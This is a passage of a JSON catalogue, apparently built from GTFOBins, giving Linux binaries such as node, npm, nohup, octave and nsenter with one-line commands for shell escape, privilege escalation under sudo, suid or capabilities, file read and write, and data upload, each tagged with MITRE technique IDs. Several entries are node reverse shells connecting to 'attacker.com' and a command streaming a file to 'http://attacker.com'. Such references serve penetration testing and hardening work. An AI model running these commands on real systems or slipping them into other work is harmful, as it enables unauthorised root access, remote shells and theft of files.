'process.stdout.write(require(\"fs\").readFileSync(\"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:file-read:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"node -e 'process.stdout.write(require(\"fs\").readFileSync(\"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:file-write:0:sudo","toolId":"gtfo:node","toolName":"node","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"node -e 'require(\"fs\").writeFileSync(\"/path/to/output-file\", \"DATA\")'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:file-write:0:suid","toolId":"gtfo:node","toolName":"node","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"node -e 'require(\"fs\").writeFileSync(\"/path/to/output-file\", \"DATA\")'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:file-write:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"node -e 'require(\"fs\").writeFileSync(\"/path/to/output-file\", \"DATA\")'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:reverse-shell:0:sudo","toolId":"gtfo:node","toolName":"node","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nrequire(\"net\").connect(12345, \"attacker.com\", function () {\n this.pipe(sh.stdin);\n sh.stdout.pipe(this);\n sh.stderr.pipe(this);\n})'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:reverse-shell:0:suid","toolId":"gtfo:node","toolName":"node","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\", [\"-p\"]);\nrequire(\"net\").connect(12345, \"attacker.com\", function () {\n this.pipe(sh.stdin);\n sh.stdout.pipe(this);\n sh.stderr.pipe(this);\n})'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:reverse-shell:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nrequire(\"net\").connect(12345, \"attacker.com\", function () {\n this.pipe(sh.stdin);\n sh.stdout.pipe(this);\n sh.stderr.pipe(this);\n})'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:shell:0:capabilities","toolId":"gtfo:node","toolName":"node","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"node -e 'process.setuid(0); require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:shell:0:sudo","toolId":"gtfo:node","toolName":"node","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"node -e 'require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:shell:0:suid","toolId":"gtfo:node","toolName":"node","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"node -e 'require(\"child_process\").spawn(\"/bin/sh\", [\"-p\"], {stdio: [0, 1, 2]})'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:shell:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"node -e 'require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:upload:0:sudo","toolId":"gtfo:node","toolName":"node","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"node -e 'require(\"fs\").createReadStream(\"/path/to/input-file\").pipe(require(\"http\").request(\"http://attacker.com/path/to/output-file\"))'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:upload:0:suid","toolId":"gtfo:node","toolName":"node","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"node -e 'require(\"fs\").createReadStream(\"/path/to/input-file\").pipe(require(\"http\").request(\"http://attacker.com/path/to/output-file\"))'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:upload:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"node -e 'require(\"fs\").createReadStream(\"/path/to/input-file\").pipe(require(\"http\").request(\"http://attacker.com/path/to/output-file\"))'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nohup:command:0:sudo","toolId":"gtfo:nohup","toolName":"nohup","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"nohup /path/to/command\ncat nohup.out","description":"The `nohup.out` file contains the standard output and error of the command.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nohup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nohup:command:0:suid","toolId":"gtfo:nohup","toolName":"nohup","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"nohup /path/to/command\ncat nohup.out","description":"The `nohup.out` file contains the standard output and error of the command.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nohup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nohup:command:0:unprivileged","toolId":"gtfo:nohup","toolName":"nohup","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"nohup /path/to/command\ncat nohup.out","description":"The `nohup.out` file contains the standard output and error of the command.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nohup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nohup:shell:0:sudo","toolId":"gtfo:nohup","toolName":"nohup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nohup /bin/sh -c '/bin/sh </dev/tty >/dev/tty 2>/dev/tty'","description":"This creates a `nohup.out` file in the current working directory.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nohup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nohup:shell:0:suid","toolId":"gtfo:nohup","toolName":"nohup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nohup /bin/sh -p -c '/bin/sh -p </dev/tty >/dev/tty 2>/dev/tty'","description":"This creates a `nohup.out` file in the current working directory.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nohup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nohup:shell:0:unprivileged","toolId":"gtfo:nohup","toolName":"nohup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nohup /bin/sh -c '/bin/sh </dev/tty >/dev/tty 2>/dev/tty'","description":"This creates a `nohup.out` file in the current working directory.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nohup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:npm:shell:0:sudo","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"npm exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/npm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:npm:shell:0:unprivileged","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"npm exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/npm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:npm:shell:1:sudo","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' >package.json\nnpm -C . i","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/npm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:npm:shell:1:unprivileged","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' >package.json\nnpm -C . i","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/npm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:npm:shell:2:sudo","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"xxx\": \"/bin/sh\"}}' >package.json\nnpm -C . run xxx","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/npm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:npm:shell:2:unprivileged","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"xxx\": \"/bin/sh\"}}' >package.json\nnpm -C . run xxx","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/npm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nroff:file-read:0:sudo","toolId":"gtfo:nroff","toolName":"nroff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nroff /path/to/input-file","description":"The file is typeset and some warning messages may appear.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nroff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nroff:file-read:0:unprivileged","toolId":"gtfo:nroff","toolName":"nroff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nroff /path/to/input-file","description":"The file is typeset and some warning messages may appear.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nroff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nroff:shell:0:sudo","toolId":"gtfo:nroff","toolName":"nroff","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo /bin/sh >groff\nchmod +x groff\nGROFF_BIN_PATH=. nroff","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nroff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nroff:shell:0:unprivileged","toolId":"gtfo:nroff","toolName":"nroff","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo /bin/sh >groff\nchmod +x groff\nGROFF_BIN_PATH=. nroff","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nroff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nsenter:shell:0:sudo","toolId":"gtfo:nsenter","toolName":"nsenter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nsenter /bin/sh","description":"The shell command can be omitted.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nsenter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nsenter:shell:0:suid","toolId":"gtfo:nsenter","toolName":"nsenter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nsenter /bin/sh -p","description":"The shell command can be omitted.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nsenter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nsenter:shell:0:unprivileged","toolId":"gtfo:nsenter","toolName":"nsenter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nsenter /bin/sh","description":"The shell command can be omitted.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nsenter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ntpdate:file-read:0:sudo","toolId":"gtfo:ntpdate","toolName":"ntpdate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ntpdate -a x -k /path/to/input-file -d localhost","description":"The file is actually parsed and lines are leaked through error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ntpdate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ntpdate:file-read:0:suid","toolId":"gtfo:ntpdate","toolName":"ntpdate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ntpdate -a x -k /path/to/input-file -d localhost","description":"The file is actually parsed and lines are leaked through error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ntpdate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ntpdate:file-read:0:unprivileged","toolId":"gtfo:ntpdate","toolName":"ntpdate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ntpdate -a x -k /path/to/input-file -d localhost","description":"The file is actually parsed and lines are leaked through error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ntpdate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:octave:file-read:0:sudo","toolId":"gtfo:octave","toolName":"octave","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"octave-cli --eval 'format none; fid = fopen(\"/path/to/input-file\"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/octave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:octave:file-read:0:suid","toolId":"gtfo:octave","toolName":"octave","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"octave-cli --eval 'format none; fid = fopen(\"/path/to/input-file\"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/octave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:octave:file-read:0:unprivileged","toolId":"gtfo:octave","toolName":"octave","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"octave-cli --eval 'format none; fid = fopen(\"/path/to/input-file\"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/octave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:octave:file-write:0:sudo","toolId":"gtfo:octave","toolName":"octave","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"octave-cli --eval 'fid = fopen(\"/path/to/output-file\", \"w\"); fputs(fid, \"DATA\"); fclose(fid);'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/octave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:octave:file-write:0:suid","toolId":"gtfo:octave","toolName":"octave","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"octave-cli --eval 'fid = fopen(\"/path/to/output-file\", \"w\"); fputs(fid, \"DATA\"); fclose(fid);'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/octave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:octave:file-write:0:unprivileged","toolId":"gtfo:octave","toolName":"octave","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"octave-cli --eval 'fid = fopen(\"/path/to/output-file\", \"w\"); fputs(fid, \"DATA\"); fclose(fid);'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/octave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:octave:shell:0:sudo","toolId":"gtfo:octave","toolName":"octave","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"octave-cli --eval 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/octave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:octave:shell:0:suid","toolId":"gtfo:octave","toolName":"octave","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"octave-cli --eval 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/octave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:octave:shell:0:unprivileged","toolId":"gtfo:octave","toolName":"octave","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"octave-cli --eval 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/octave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:od:file-read:0:sudo","toolId":"gtfo:od","toolName":"od","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"od -An -c -w999 /path/to/input-file","description":"Three spaces are added before each character in the read file (wrapped at the specified value, i.e., `999`), and non-printable chars are printed as backslash escape sequences.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/od/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:od:file-read:0:suid","toolId":"gtfo:od","toolName":"od","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"od -An -c -w999 /path/to/input-file","description":"Three spaces are added before each character in the read file (wrapped at the specified value, i.e., `999`), and non-printable chars are printed as backslash escape sequences.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/od/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:od:file-read:0:unprivileged","toolId":"gtfo:od","toolName":"od","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"od -An -c -w999 /path/to/input-file","description":"Three spaces are added before each character in the read file (wrapped at the specified value, i.e., `999`), and non-printable chars are printed as backslash escape sequences.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/od/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:opencode:command:0:sudo","toolId":"gtfo:opencode","toolName":"opencode","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"opencode\n! /path/to/command","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/opencode/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:opencode:command:0:suid","toolId":"gtfo:opencode","toolName":"opencode","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"opencode\n! /path/to/command","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/opencode/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:opencode:command:0:unprivileged","toolId":"gtfo:opencode","toolName":"opencode","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"opencode\n! /path/to/command","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/opencode/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 